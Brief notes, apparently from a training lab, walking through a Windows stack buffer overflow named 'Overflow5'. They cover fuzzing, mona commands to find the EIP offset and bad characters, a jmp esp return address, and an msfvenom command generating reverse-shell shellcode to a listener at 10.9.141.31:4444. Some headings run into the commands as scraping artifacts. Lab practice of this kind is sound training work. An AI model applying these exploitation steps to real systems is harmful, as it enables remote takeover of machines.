Overflow5
1. Fuzz application to find number of bytes needed to crash the application
Bytes needed to crash application: 400
2. Set mona configuration
!mona config -set workingfolder c:\mona\%p
3. Find EIP offset
EIP offset/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 400
!mona findmsp -distance 400
EIP offset: 314
4. Find bad characters
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
Bad characters: \x00\x16\x2f\xf4\xfd
5. Find jmp esp instruction sets without any bad characters
jmp esp instruction sets without any bad characters!mona jmp -r esp -cpb "\x00\x16\x2f\xf4\xfd"
Return address: 0x625011af
6. Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x16\x2f\xf4\xfd" -f c
7. Set nop sled in padding
nop sled in paddingLast updated